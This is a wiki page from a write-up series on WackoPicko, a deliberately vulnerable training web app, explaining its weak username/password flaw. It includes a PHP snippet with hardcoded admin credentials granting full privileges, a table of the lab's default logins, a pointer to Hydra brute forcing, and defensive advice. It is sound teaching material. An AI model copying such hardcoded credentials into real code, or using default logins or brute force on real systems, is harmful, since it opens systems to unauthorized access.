WackoPicko/Weak-Username-Password

From aldeid
Jump to: navigation, search
You are here:
Weak Username/Password

Description

How many web applications (intranet, extranet, internet) suffer from weak authentication mechanisms? And how many applications suffer from weak passwords? I have worked for companies that develop web applications from a framework that contains the string:

if($username=="admin" && $password=="password") {
  /***
   * Grant access with full privs
   */
}

This example illustrates a weak combination of admin/admin as login/password, that gives access to the backend of the application.

Proof of Concept

No need for a PoC, here is the table of valid credentials:

Priv Username Password
Standard scanner1 scanner1
Standard scanner2 scanner2
Standard bryce bryce
Admin admin admin
Admin adamd adamd

How to detect?

  • Hydra is likely to be used in this case.
  • Refer to this article for more information: Bruteforce.

How to protect against it?

  • Enforce passwords (strong password policy)
  • Encrypt the passwords in your database with a strong encryption mechnaism
  • Protect your application against brute force attacks (e.g. deny IP address from 3 unsuccessful login attempts). The attacker could still change his IP but it is more complicated.

Comments

Talk:WackoPicko/Weak-Username-Password